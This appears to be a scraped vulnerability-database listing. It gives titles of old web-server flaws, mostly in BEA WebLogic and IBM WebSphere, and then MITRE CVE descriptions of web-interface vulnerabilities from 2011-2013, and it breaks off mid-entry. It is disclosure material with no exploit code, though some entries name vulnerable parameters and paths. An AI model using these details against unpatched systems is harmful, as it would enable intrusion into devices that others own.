[2849] BEA WebLogic 8.1 ear File information disclosure [2848] BEA WebLogic 8.1 WS-Security unknown vulnerability [2847] BEA WebLogic 8.1 Thread Management denial of service [2846] BEA WebLogic 8.1 JDBCDataSourceFactory weak encryption [2845] BEA WebLogic up to 8.1.5 X.509 Client Certificate weak authentication [2844] BEA WebLogic 8.1 SSL weak encryption [2812] Sun ONE/iPlanet Web Server 4.x /search cross site scripting [2783] Novell NetWare 2.0.48/6.5 Welcome Webapp cross site scripting [2763] IBM WebSphere Application Server up to 6.0.2.17 Servlet information disclosure [2707] MailEnable 2.32 WebAdmin privilege escalation [2701] IBM WebSphere Application Server up to 6.1.0.3 on z/OS handleservantnotification Numeric Error [2700] IBM WebSphere Application Server up to 6.1.0.3 Eal4 Authentication Numeric Error [2652] SAP Web Application Server up to 7.00 enserver.exe denial of service [2651] SAP Web Application Server up to 7.00 privilege escalation [2605] IBM WebSphere Application Server up to 6.1.0.2 WSN Authentication information disclosure [2604] IBM WebSphere Application Server up to 6.1.0.2 JSP File unknown vulnerability [2503] Jamie Cameron Webmin/Usermin up to 1.296 cross site scripting [2502] Jamie Cameron Webmin/Usermin up to 1.296 HTTP GET cross site scripting [2451] Veritas Backup Exec up to 9.2 RPC Interface memory corruption [2450] IBM WebSphere Application Server up to 6.1.0.1 Trace privilege escalation [2449] IBM WebSphere Application Server up to 6.1.0.1 Log File privilege escalation [2446] IBM WebSphere Application Server up to 6.1.0.1 SOAP privilege escalation [2428] Novell GroupWise 6.5/7 WebAccess cross site scripting [2418] VMware ESX Server 2.5.3 Upgrade Patch 2 Management Interface unknown vulnerability [2417] VMware ESX Server 2.5.3 Upgrade Patch 2 Management Interface unknown vulnerability [2416] VMware ESX Server 2.5.3 Upgrade Patch 2 Management Interface weak encryption [2410] Check Point Firewall-1 up to R55W HFA03 Web Server directory traversal [2375] Cisco Router Web Setup up to 3.3.0 Build 31 Web Frontend privilege escalation [2350] Jamie Cameron Webmin 1.2.80 weak authentication [2342] Trend Micro Control Manager up to 3.5 Web-Frontend cross site scripting [2341] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 Web Container information disclosure [2338] Jamie Cameron Webmin 1.2.30/1.2.40/1.2.50/1.2.60/1.2.70 cvename.cgi directory traversal [2332] IBM WebSphere Application Server up to 6.0.2.10 Configuration Object information disclosure [2331] IBM WebSphere Application Server up to 6.0.2.10 Datasource Password Encryption unknown vulnerability [2312] Microsoft Exchange 2000 Outlook Web Access cross site scripting [2246] BEA WebLogic up to 8.1 SP2 stopWebLogic.sh unknown vulnerability [2245] BEA WebLogic 8.1 Private Key unknown vulnerability [2244] BEA WebLogic up to 8.1 SP4 unknown vulnerability [2243] BEA WebLogic up to 8.1 SP4 JDBC Policy unknown vulnerability [2242] BEA WebLogic 8.1 Java Web Service unknown vulnerability [2241] BEA WebLogic up to 9.0 Administration Console unknown vulnerability [2240] BEA WebLogic up to 8.1 SP4 Administrator Console unknown vulnerability [2239] BEA WebLogic up to 8.1 SP4 JavaServer Pages unknown vulnerability [2238] BEA WebLogic up to 8.1 Domain Directory unknown vulnerability [2237] BEA WebLogic up to 8.1 SP4 Client Connection Manager weak encryption [2236] BEA WebLogic up to 8.1 SP4 JTA Transaction unknown vulnerability [2214] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 unknown vulnerability [2213] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 LTPA EJB unknown vulnerability [2212] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 Trace unknown vulnerability [2210] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 SOAP unknown vulnerability [2209] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 User Information addNode.log unknown vulnerability [2208] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 HTTP Request unknown vulnerability [2204] IBM WebSphere Application Server up to 6.0.2.3 Welcome Page weak authentication [2097] BEA WebLogic up to 8.1 SP5 JSR-168 Portlet Cache information disclosure [2096] BEA WebLogic up to 6.1 SP7 XML Parser denial of service [2095] BEA WebLogic up to 6.1 SP7 Internal Servlet information disclosure [2072] SAP Web Application Server up to 7.00 privilege escalation [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2011] BEA WebLogic 6.1/7.0 Domains weak encryption [2010] BEA WebLogic Portal up to 8.1 SP5 JNDI denial of service [2009] BEA WebLogic Portal up to 8.1 SP5 SSL Identity denial of service [2008] BEA WebLogic Portal up to 8.1 SP5 Connection Filter denial of service [2007] BEA WebLogic Portal up to 8.1 SP5 Security Provider denial of service [2006] BEA WebLogic Portal up to 8.1 SP5 Password Encryption unknown vulnerability [2005] BEA WebLogic Portal up to 8.1 SP5 Password Change Log unknown vulnerability [2004] BEA WebLogic Portal up to 8.1 SP5 Logging information disclosure [2003] BEA WebLogic Portal up to 8.1 SP5 Java Client MBean RMI weak encryption [2002] BEA WebLogic Portal up to 8.1 SP5 WSRP unknown vulnerability [2001] BEA WebLogic Portal up to 8.1 SP5 File Source Stored unknown vulnerability [2000] BEA WebLogic Portal up to 8.1 SP5 Stored unknown vulnerability [1973] BEA WebLogic 6.0/6.1/7.0.0.1/8.1 MBeansHome unknown vulnerability [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1937] VMware ESX Server up to 2.5.2 Management Interface cross site scripting [1925] IBM AIX 5.3/5.3 L WebSM getShell/getCommand privilege escalation [1888] SAP Web Application Server up to 7.00 frameset.htm cross site scripting [1887] SAP Web Application Server up to 7.00 Test Application cross site scripting [1886] SAP Web Application Server up to 7.00 Error Message cross site scripting [1885] SAP Web Application Server up to 7.00 fameset.htm cross site scripting [1872] IBM Lotus Domino up to 6.5.4 FP2 Domino Web Access denial of service [1869] IBM Lotus Domino up to 6.5.4 FP2 Domino Web Access denial of service [1787] BEA WebLogic 6.1/7.0/8.1 unknown vulnerability [1783] Sun Java System Directory Server up to 5.2 HTTP Admin Interface memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1755] Jamie Cameron Webmin 1.2.20 PAM Authentication weak authentication [1705] BEA WebLogic Portal up to 8.1 SP4 URL config.xml privilege escalation [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1571] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1563] Sun Java Web Start Sandbox unknown vulnerability [1542] IBM WebSphere Application Server up to 5.0.2.11 Administration Console Authentication memory corruption [1518] BEA WebLogic up to 8.1 memory corruption [1517] BEA WebLogic up to 8.1 SP3 LDAP denial of service [1516] BEA WebLogic up to 8.1 Input Fields denial of service [1515] BEA WebLogic up to 8.1 Clustering denial of service [1514] BEA WebLogic up to 8.1 Control UserLogin weak authentication [1513] BEA WebLogic up to 8.1 Security Settings unknown vulnerability [1512] BEA WebLogic up to 8.1 Auditing denial of service [1511] BEA WebLogic up to 8.1 JDBC Connection Reset weak encryption [1428] Symantec Web Security up to 3.0.1.74 RAR Archive denial of service [1425] Oracle Database 9 Web Cache File Blacklist unknown vulnerability [1423] Oracle Application Server 9 Web Cache webcacheadmin cross site scripting [1422] Oracle Application Server 10g Web Cache webcacheadmin cross site scripting [1421] BEA WebLogic 8.1 Administration Server Console cross site scripting [1412] IBM WebSphere Application Server up to 6.0 HTTP Error Message cross site scripting [1408] Sun Java System Web Proxy Server up to 3.6 SP 6 memory corruption [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1369] IBM WebSphere Application Server up to 6.x HTTP Host-Header information disclosure [1340] IBM Lotus Domino up to 6.0.5/6.5.4 Web Data Fields memory corruption [1338] IBM Lotus Domino up to 6.5.1 Web Service /cgi-bin denial of service [1330] SonicWALL SOHO 5.1.7.0 Web Administration Login cross site scripting [1278] IBM WebSphere Commerce up to 5.6.0.2 unknown vulnerability [1242] phpMyAdmin 2.6.1 Error Message database_interface.lib.php information disclosure [1229] BEA WebLogic 7.0/8.1 cross site scripting [1218] IBM WebSphere Application Server 5.x/6.0 JSP Source Code information disclosure [1188] Microsoft Exchange 2003 Outlook Web Access owalogon.asp information disclosure [1121] Squid Proxy up to 2.5.STABLE7 Web Cache Communication Protocol denial of service [1035] Sun Java System Web/Application Server up to 7 Session-ID unknown vulnerability [1021] Novell GroupWise WebAccess /servlet/webacc weak authentication [1020] Novell GroupWise WebAccess /servlet/webacc weak authentication [915] McAfee VirusScan/WebShield/GroupShield ZIP Archive unknown vulnerability [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [831] BEA WebLogic up to 8.1 SP2 JNDI memory corruption [783] Microsoft Exchange 5.5 Outlook Web Access HTML Redirection cross site scripting [746] IBM Lotus Domino 6.x Web Access denial of service [735] BEA WebLogic 7.0/8.3 role-name weak authentication [715] BEA WebLogic 6.1/7.0/7.0.0.1/8.1 RMI via IIOP privilege escalation [714] BEA WebLogic 8.1 SSL Connection denial of service [705] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [704] Microsoft ISA Server 2000 SP2 Web Proxy privilege escalation [703] Microsoft ISA Server 2000 SP2 Web Proxy denial of service [696] Jamie Cameron Webmin up to 1.150 Administration denial of service [693] IBM WebSphere denial of service [687] Sambar Server 6.1 Sysadmin Web Site showini.asp directory traversal [686] Sambar Server 6.1 Sysadmin Web Site showperf.asp cross site scripting [660] Sun Solaris 8.0/9.0 SMC Webserver containing sendError directory traversal [625] BEA WebLogic up to 8.1 SP2 Config Log File config.sh weak encryption [624] BEA WebLogic 7.0/8.1 URL Filter / privilege escalation [623] BEA WebLogic 6.1/7.0/8.1 EJB Object privilege escalation [613] BEA WebLogic 7.0/8.1 Custom Trust Manager administrator's weak authentication [611] BEA WebLogic 7.0/7.0.0.1/8.1 administrator unknown vulnerability [574] Trend Micro VirusWall up to 3.52 Build1466 on Windows /ishttpd/localweb/java/ directory traversal [541] Symantec Firewall/VPN 100/200/200R Web Frontend Password weak encryption [495] BEA WebLogic 6.1/7.0/8.1 Administration Server Console config.xml weak encryption [494] BEA WebLogic up to 8.x SP2 Operators information disclosure [493] BEA WebLogic 5.1/6.1/7.0/8.1 HTTP TRACE containing information disclosure [492] BEA WebLogic 7.0 FAT Client Certificate Authentication weak authentication [482] Symantec Web Security 2.5/3.0.0/3.0.1 Default Block Page cross site scripting [479] Microsoft Exchange 2003 Outlook Web Access information disclosure [475] BEA WebLogic up to 7.x JVM XML denial of service [436] IBM WebSphere up to 5.0.2.1 Request DTD Attribute denial of service [424] Sun ONE/iPlanet Web Server up to 4.1 SP12/6.0 SP5 denial of service [419] Microsoft Exchange 2003 Outlook Web Access information disclosure [400] Sun ONE Web Server 4.1/6.0 Log Entry unknown vulnerability [395] BEA WebLogic up to 8.1 JNDI via RMI information disclosure [394] BEA WebLogic up to 8.1 Node Manager denial of service [393] BEA WebLogic 6.0/6.1/7.0.0.1/8.1 JMS Provider unknown vulnerability [392] BEA WebLogic 6.0/6.1/7.0.0.1/8.1 T3 via SSL unknown vulnerability [391] BEA WebLogic up to 8.1 Proxy Plugin denial of service [334] Microsoft Exchange 5.5 Outlook Web Access cross site scripting [267] AOL ICQ 2003a Build3777/2003a Build3799/2003a Build3800 Webfront Guestbook cross site scripting [190] Microsoft IIS 6.0 Admin Interface weak authentication [189] Microsoft IIS 6.0 Admin Interface weak authentication [187] Microsoft IIS 6.0 Admin Interface cross site scripting [86] Microsoft IIS 5.0/5.1 WebDAV denial of service [15] Microsoft IIS 5.0 WebDav memory corruption MITRE CVE - https://cve.mitre.org: [CVE-2013-4785] The web interface for Dell iDRAC 6 firmware 1.7, and possibly other versions, allows remote attackers to modify the CLP interface for arbitrary users and possibly have other impact via a request to an unspecified form that is accessible from testurls.html. [CVE-2013-4731] ajax.cgi in the web interface on the Choice Wireless Green Packet WIXFMR-111 4G WiMax modem allows remote attackers to execute arbitrary commands via shell metacharacters in the pip parameter in an Ajax tag_ipPing request, a different vulnerability than CVE-2013-3581. [CVE-2013-4620] Cross-site scripting (XSS) vulnerability in interface/main/onotes/office_comments_full.php in OpenEMR 4.1.1 allows remote attackers to inject arbitrary web script or HTML via the note parameter. [CVE-2013-3633] The web interface on Siemens Scalance X200 IRT switches with firmware before X-200IRT 5.1.0 relies on client-side privilege checks, which allows remote authenticated users to execute arbitrary commands via unspecified vectors. [CVE-2013-3581] ajax.cgi in the web interface on the Choice Wireless Green Packet WIXFMR-111 4G WiMax modem allows remote attackers to obtain sensitive information via an Ajax (1) wmxState or (2) netState request. [CVE-2013-3500] The Foundation webapp admin interface in GroundWork Monitor Enterprise 6.7.0 uses the nagios account as the owner of writable files under /usr/local/groundwork, which allows context-dependent attackers to bypass intended filesystem restrictions by leveraging access to a GroundWork script. [CVE-2013-3457] Absolute path traversal vulnerability in the web interface in Cisco Finesse allows remote attackers to read directory contents via a direct request to a directory URL, aka Bug ID CSCug16772. [CVE-2013-3440] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface in Cisco Unified Operations Manager allow remote attackers to inject arbitrary web script or HTML, and obtain improperly secured cookies, via unspecified vectors, aka Bug ID CSCud80186. [CVE-2013-3428] The web interface in Cisco Secure Access Control System (ACS) does not properly suppress error-condition details, which allows remote authenticated users to obtain sensitive information via an unspecified request that triggers an error, aka Bug ID CSCue65957. [CVE-2013-3423] Cross-site scripting (XSS) vulnerability in the web interface in Cisco Secure Access Control System (ACS) allows remote attackers to inject arbitrary web script or HTML via an unspecified field, aka Bug ID CSCud75174. [CVE-2013-3380] The administrative web interface in the Access Control Server in Cisco Secure Access Control System (ACS) does not properly restrict the report view page, which allows remote authenticated users to obtain sensitive information via a direct request, aka Bug ID CSCue79279. [CVE-2013-3080] VMware vCenter Server Appliance (vCSA) 5.1 before Update 1 allows remote authenticated users to create or overwrite arbitrary files, and consequently execute arbitrary code or cause a denial of service, by leveraging Virtual Appliance Management Interface (VAMI) web-interface access. [CVE-2013-2560] Directory traversal vulnerability in the web interface on Foscam devices with firmware before 11.37.2.49 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI, as demonstrated by discovering (1) web credentials or (2) Wi-Fi credentials. [CVE-2013-1611] Multiple cross-site scripting (XSS) vulnerabilities in administrative-interface pages in the management console in Symantec Brightmail Gateway 9.5.x allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2013-1185] The web interface in the Manager component in Cisco Unified Computing System (UCS) 1.x and 2.x before 2.0(2m) allows remote attackers to obtain sensitive information by reading a (1) technical-support bundle file or (2) on-device configuration backup, aka Bug ID CSCtq86543. [CVE-2013-1153] Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676. [CVE-2013-0944] The web-based file-restore interface in EMC Avamar Server before 6.1.0 allows remote authenticated users to read arbitrary files via a crafted URL. [CVE-2013-0673] Directory traversal vulnerability in the web interface in the Health Monitor service in MatrikonOPC A&E Historian 1.0.0.0 allows remote attackers to read and delete arbitrary files via a crafted URL. [CVE-2013-0134] Cross-site scripting (XSS) vulnerability in the web interface in AirDroid allows remote attackers to inject arbitrary web script or HTML via a crafted text message that is transmitted by a managed phone. [CVE-2013-0124] Multiple cross-site scripting (XSS) vulnerabilities in the administration interface in ASKIA askiaweb allow remote attackers to inject arbitrary web script or HTML via the (1) Number or (2) UpdatePage parameter to WebProd/cgi-bin/AskiaExt.dll. [CVE-2013-0123] Multiple SQL injection vulnerabilities in the administration interface in ASKIA askiaweb allow remote attackers to execute arbitrary SQL commands via (1) the nHistoryId parameter to WebProd/pages/pgHistory.asp or (2) the OrderBy parameter to WebProd/pages/pgadmin.asp. [CVE-2013-0120] The web interface on Dell PowerConnect 6248P switches allows remote attackers to cause a denial of service (device crash) via a malformed request. [CVE-2012-6339] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface in Cerberus FTP Server before 5.0.6.0 allow (1) remote attackers to inject arbitrary web script or HTML via a log entry that is not properly handled within the Log Manager component, and might allow (2) remote authenticated administrators to inject arbitrary web script or HTML via a Messages field to the servermanager program. [CVE-2012-6276] Directory traversal vulnerability in the web-based management interface on the TP-LINK TL-WR841N router with firmware 3.13.9 build 120201 Rel.54965n and earlier allows remote attackers to read arbitrary files via the URL parameter. [CVE-2012-5942] Cross-site scripting (XSS) vulnerability in the Data Management Portal Web User Interface in IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.2.x before 7.2.1.4 allows remote authenticated users to inject content, and conduct phishing attacks, via unspecified vectors. [CVE-2012-5939] Cross-site scripting (XSS) vulnerability in Welcome.do in the Data Management Portal Web User Interface in IBM Tivoli Application Dependency Discovery Manager (TADDM) 7.2.x before 7.2.1.4 allows remote authenticated users to inject arbitrary web script or HTML via a crafted URL. [CVE-2012-5767] Unspecified vulnerability in the web interface on the IBM TS3500 Tape Library with firmware before C260 allows remote authenticated users to gain privileges via unspecified vectors. [CVE-2012-5758] The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2 does not require authentication for an unspecified interface, which allows remote attackers to cause a denial of service (process exit) via unknown vectors. [CVE-2012-5519] CUPS 1.4.4, when running in certain Linux distributions such as Debian GNU/Linux, stores the web interface administrator key in /var/run/cups/certs/0 using certain permissions, which allows local users in the lpadmin group to read or write arbitrary files as root by leveraging the web interface. [CVE-2012-5058] Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to the Web interface. [CVE-2012-5053] Cross-site scripting (XSS) vulnerability in the Receiver Web User Interface on Trimble Infrastructure GNSS Series Receivers NetR3, NetR5, NetR8, and NetR9 before 4.70, and NetRS before 1.3-2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4970] Cross-site scripting (XSS) vulnerability in the web management interface on Polycom HDX Video End Points with UC APL software before 2.7.1.1_J, and commercial software before 3.0.5, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4950] Cross-site scripting (XSS) vulnerability in the Keyword Search page in the web interface in Pattern Insight 2.3 allows remote attackers to inject arbitrary web script or HTML via crafted characters that are not properly handled during construction of error messages. [CVE-2012-4939] Cross-site scripting (XSS) vulnerability in IPAMSummaryView.aspx in the IPAM web interface before 3.0-HotFix1 in SolarWinds Orion Network Performance Monitor might allow remote attackers to inject arbitrary web script or HTML via the "Search for an IP address" field. [CVE-2012-4938] Cross-site scripting (XSS) vulnerability in the web interface in Pattern Insight 2.3 allows remote authenticated administrators to inject arbitrary web script or HTML via the banner message. [CVE-2012-4937] Session fixation vulnerability in the web interface in Pattern Insight 2.3 allows remote attackers to hijack web sessions via a jsession_id cookie. [CVE-2012-4936] The web interface in Pattern Insight 2.3 allows remote attackers to conduct clickjacking attacks via a FRAME element. [CVE-2012-4935] Cross-site request forgery (CSRF) vulnerability in the web interface in Pattern Insight 2.3 allows remote attackers to hijack the authentication of arbitrary users. [CVE-2012-4839] The OSLC interface in the Web Client (aka CQ Web) in IBM Rational ClearQuest 7.1.2.x before 7.1.2.9 and 8.0.0.x before 8.0.0.5 allows remote attackers to conduct phishing attacks via a FRAME element. [CVE-2012-4609] The web interface in EMC RSA NetWitness Informer before 2.0.5.6 allows remote attackers to conduct clickjacking attacks via unspecified vectors. [CVE-2012-4608] Cross-site request forgery (CSRF) vulnerability in the web interface in EMC RSA NetWitness Informer before 2.0.5.6 allows remote attackers to hijack the authentication of arbitrary users. [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string. [CVE-2012-4493] Cross-site scripting (XSS) vulnerability in the administrative interface in the Better Revisions module 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the "administer better revisions" permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4484] Cross-site scripting (XSS) vulnerability in the administrative interface in the Campaign Monitor module before 6.x-2.5 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-4019] Cross-site scripting (XSS) vulnerability in tokyo_bbs.cgi in Come on Girls Interface (CGI) Tokyo BBS allows remote attackers to inject arbitrary web script or HTML via vectors related to the error page. [CVE-2012-3580] Symantec Messaging Gateway (SMG) before 10.0 allows remote authenticated users to modify the web application by leveraging access to the management interface. [CVE-2012-3503] The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token. [CVE-2012-3414] Cross-site scripting (XSS) vulnerability in swfupload.swf in SWFUpload 2.2.0.1 and earlier, as used in WordPress before 3.3.2, TinyMCE Image Manager 1.1, and other products, allows remote attackers to inject arbitrary web script or HTML via the movieName parameter, related to the "ExternalInterface.call" function. [CVE-2012-3367] Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate System does not properly check certificate revocation requests made through the web interface, which allows remote attackers with permissions to revoke end entity certificates to revoke the Certificate Authority (CA) certificate. [CVE-2012-3138] Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Web interface. [CVE-2012-3076] The administrative web interface on Cisco TelePresence Recording Server before 1.8.0 allows remote authenticated users to execute arbitrary commands via unspecified vectors, aka Bug ID CSCth85804. [CVE-2012-3075] The administrative web interface on Cisco TelePresence Immersive Endpoint Devices before 1.7.4 allows remote authenticated users to execute arbitrary commands via a malformed request on TCP port 443, aka Bug ID CSCtn99724. [CVE-2012-3002] The web interface on (1) Foscam and (2) Wansview IP cameras allows remote attackers to bypass authentication, and perform administrative functions or read the admin password, via a direct request to an unspecified URL. [CVE-2012-2999] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface in Cerberus FTP Server before 5.0.5.0 allow remote attackers to hijack the authentication of administrators for requests that (1) add a user account or (2) reconfigure the state of the FTP service, as demonstrated by a request to usermanager/users/modify. [CVE-2012-2974] The web interface on the SMC SMC8024L2 switch allows remote attackers to bypass authentication and obtain administrative access via a direct request to a .html file under (1) status/, (2) system/, (3) ports/, (4) trunks/, (5) vlans/, (6) qos/, (7) rstp/, (8) dot1x/, (9) security/, (10) igmps/, or (11) snmp/. [CVE-2012-2963] The administrative interface in the embedded web server on the BreakingPoint Storm appliance before 3.0 does not require authentication for the gwt/BugReport script, which allows remote attackers to obtain sensitive information by downloading a .tgz file. [CVE-2012-2955] Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in IBM Lotus Protector for Mail Security 2.1, 2.5, 2.5.1, and 2.8 and IBM ISS Proventia Network Mail Security System allow remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2012-2604] Multiple cross-site scripting (XSS) vulnerabilities in GuestAccess.jsp in the Guest/Contractor access component in the administrative interface in Bradford Network Sentry before 5.3.3 allow remote authenticated users to inject arbitrary web script or HTML via unspecified fields. [CVE-2012-2564] Multiple cross-site request forgery (CSRF) vulnerabilities in the administrative interface in Bloxx Web Filtering before 5.0.14 allow remote attackers to hijack the authentication of administrators for requests that perform administrative actions. [CVE-2012-2440] The default configuration of the TP-Link 8840T router enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors. [CVE-2012-2439] The default configuration of the NETGEAR ProSafe FVS318N firewall enables web-based administration on the WAN interface, which allows remote attackers to establish an HTTP connection and possibly have unspecified other impact via unknown vectors. [CVE-2012-1838] The web management interface on the LG-Nortel ELO GS24M switch allows remote attackers to bypass authentication, and consequently obtain cleartext credential and configuration information, via a direct request to a configuration web page. [CVE-2012-1239] The TopAccess web-based management interface on TOSHIBA TEC e-Studio multi-function peripheral (MFP) devices with firmware 30x through 302, 35x through 354, and 4xx through 421 allows remote attackers to bypass authentication and obtain administrative privileges via unspecified vectors. [CVE-2012-1034] Multiple cross-site scripting (XSS) vulnerabilities in the admin interface in EPiServer CMS through 6R2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1025] Absolute path traversal vulnerability in file in Enigma2 Webinterface 1.6.0 through 1.6.8, 1.6rc3, and 1.7.0 allows remote attackers to read arbitrary files via a full pathname in the file parameter. [CVE-2012-1024] Directory traversal vulnerability in file in Enigma2 Webinterface 1.5rc1 and 1.5beta4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. [CVE-2012-0460] Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 do not properly restrict write access to the window.fullScreen object, which allows remote attackers to spoof the user interface via a crafted web page. [CVE-2012-0410] Directory traversal vulnerability in WebAccess in Novell GroupWise before 8.03 allows remote attackers to read arbitrary files via the User.interface parameter. [CVE-2012-0363] The web interface on Cisco SRP 520 series devices with firmware before 1.1.26 and SRP 520W-U and 540 series devices with firmware before 1.2.4 allows remote authenticated users to execute arbitrary commands via unspecified vectors, related to a "command injection vulnerability," aka Bug ID CSCtt46871. [CVE-2012-0340] Cross-site scripting (XSS) vulnerability in the management interface on the Cisco IronPort Encryption Appliance with software before 6.5.3 allows remote attackers to inject arbitrary web script or HTML via the header parameter to the default URI under admin/, aka bug ID 72410. [CVE-2011-5102] The Investigative Reports web interface in the TRITON management console in Websense Web Security 7.1 before Hotfix 109, 7.1.1 before Hotfix 06, 7.5 before Hotfix 78, 7.5.1 before Hotfix 12, 7.6 before Hotfix 24, and 7.6.2 before Hotfix 12 [CVE-2011-5100] The web interface in McAfee Firewall Reporter before 5.1.0.13 does not properly implement cookie authentication, which allows remote attackers to obtain access, and disable anti-virus functionality, via an HTTP request. [CVE-2011-5078] The web administration interface in the server in Sybase M-Business Anywhere 6.7 before ESD# 3 and 7.0 before ESD# 7 does not require admin authentication for unspecified scripts, which allows remote authenticated users to list or delete user accounts, modify passwords, or read log files via HTTP requests, aka Bug IDs 678497 and 678499. [CVE-2011-4837] Cross-site request forgery (CSRF) vulnerability in /ctrl in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to hijack the authentication of admins for requests that execute arbitrary programs. [CVE-2011-4836] Cross-site scripting (XSS) vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to inject arbitrary web script or HTML via a request for a crafted URI. [CVE-2011-4835] Directory traversal vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to access arbitrary files via unspecified vectors. [CVE-2011-4788] Absolute path traversal vulnerability in the web interface on HP StorageWorks P2000 G3 MSA array systems allows remote attackers to read arbitrary files via a pathname in the URI. [CVE-2011-4782] Cross-site scripting (XSS) vulnerability in libraries/config/ConfigFile.class.php in the setup interface in phpMyAdmin 3.4.x before 3.4.9 allows remote attackers to inject arbitrary web script or HTML via the host parameter. [CVE-2011-4707] Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. [CVE-2011-4436] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web interface on the Dell KACE K2000 System Deployment Appliance allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4346] Cross-site scripting (XSS) vulnerability in the web interface in Red Hat Network (RHN) Satellite 5.4.1 allows remote authenticated users to inject arbitrary web script or HTML via the Description field of the asset tag in a Custom Info page. [CVE-2011-4064] Cross-site scripting (XSS) vulnerability in the setup interface in phpMyAdmin 3.4.x before 3.4.6 allows remote attackers to inject arbitrary web script or HTML via a crafted value. [CVE-2011-4005] Cross-site request forgery (CSRF) vulnerability in the Services Ready Platform Configuration Utility web interface on the Cisco Small Business SRP521W, SRP526W, and SRP527W with firmware before 1.1.24 and the Small Business SRP541W, SRP546W, and SRP547W with firmware before 1.2.1 allows remote attackers to hijack the authentication of administrators for requests that execute arbitrary commands, aka Bug ID CSCtr45124. [CVE-2011-3294] Cross-site scripting (XSS) vulnerability in the login page in the administrative interface on Cisco TelePresence Video Communication Servers (VCS) with software before X7.0 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header, aka Bug ID CSCts80342. [CVE-2011-3206] Multiple cross-site scripting (XSS) vulnerabilities in the administration interface in RHQ 4.2.0, as used in JBoss Operations Network (aka JON or JBoss ON) before 3.0, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-2763] The web interface on the LifeSize Room appliance LS_RM1_3.5.3 (11) and 4.7.18 allows remote attackers to execute arbitrary commands via a modified request to the LSRoom_Remoting.doCommand function in gateway.php. [CVE-2011-2762] The web interface on the LifeSize Room appliance LS_RM1_3.5.3 (11) allows remote attackers to bypass authentication via unspecified data associated with a "true" authentication status, related to AMF data and the LSRoom_Remoting.authenticate function in gateway.php. [CVE-2011-2547] The web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote authenticated users to execute arbitrary commands via crafted parameters to web forms, aka Bug ID CSCtq65681. [CVE-2011-2546] SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669. [CVE-2011-2544] Cross-site scripting (XSS) vulnerability in the web interface in Cisco TelePresence System MXP Series F9.1 and 